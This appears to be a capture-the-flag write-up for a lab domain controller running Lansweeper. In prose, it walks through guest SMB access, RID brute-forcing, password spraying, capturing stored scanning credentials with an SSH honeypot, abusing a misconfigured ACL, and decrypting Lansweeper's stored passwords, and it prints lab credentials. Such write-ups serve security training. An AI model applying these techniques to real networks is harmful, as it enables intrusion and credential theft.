Sweep

Enumeration

Our initial Nmap scan reveals several standard Domain Controller ports, including DNS (53), Kerberos (88), and LDAP (389, 636, 3268), confirming the machine's role in the network. Additionally, we see HTTP services running on ports 81 and 82, which are hosting a Lansweeper login page.

We begin our SMB enumeration by checking for anonymous or guest access. Using netexec, we successfully authenticate with the guest account.

With guest access confirmed, we can perform a RID brute-force attack to extract a list of valid domain usernames.

After compiling the discovered users into a list (users.txt), we perform a password spraying attack, assuming the users might have set their passwords to match their usernames.

This spray yields a hit: the intern account is using the password intern.

Initial Foothold

Armed with the intern:intern credentials, we can log into the Lansweeper dashboard on the web service.

Navigating through the dashboard to Scanning → Scanning credentials, we discover that Lansweeper has stored login/password combinations used for scanning network assets remotely. Specifically, there is an entry for Inventory Linux mapping to an SSH key/password.

To steal these credentials, we can trick Lansweeper into authenticating with a server we control. We navigate to Scanning → Scanning Targets, add a new target IP range pointing to our attacking machine, and map the Inventory Linux credentials to it.

Next, we start a honeypot SSH server using sshesame on our attacker machine to capture the authentication attempt.

Once we trigger the scan in Lansweeper, the server connects to our honeypot, and we successfully capture the plaintext password for the domain account svc_inventory_lnx: 0|5m-U6?/uAX.

Initial Access (User Flag)

We validate our newly acquired credentials using netexec smb.

To understand our privileges, we run BloodHound against the domain. BloodHound reveals that svc_inventory_lnx is a member of the Lansweeper Discovery group. Importantly, this group is configured with a GenericAll Access Control List (ACL) over the Lansweeper Admins group.

We can abuse this misconfigured ACL by using net rpc to add our initial intern user to the Lansweeper Admins group.

Any account that is a member of the Lansweeper Admins group is granted administrative privileges on the dashboard and gains remote access capabilities. Once the command executes successfully, we can WinRM into the machine as svc_inventory_lnx. The user flag can be found in C:\user.txt .

Privilege Escalation (Root Flag)

Lansweeper stores its scanning credentials in a local database. The connection string to access this database is located in the web.config file, but it is encrypted.

If we enumerate the Lansweeper installation directory at C:\Program Files (x86)\Lansweeper, we can find the encrypted configuration file inside the Website folder, as well as the encryption key stored locally in the Key folder.

To streamline the decryption process, we can use a script like LansweeperDecrypt.ps1 (or the compiled C# equivalent, SharpLansweeperDecrypt). This tool automatically grabs the connection string from the web.config, decrypts it, queries the database for the stored credentials, and uses Encryption.txt to decrypt those passwords.

We upload the script to our target via our WinRM session and execute it:

The script successfully decrypts several credentials. While we already have the Linux inventory password, the script reveals a new password for the Windows inventory service account: 4^56!sK&}eA?.

we can establish a new WinRM session as this user and read the root flag.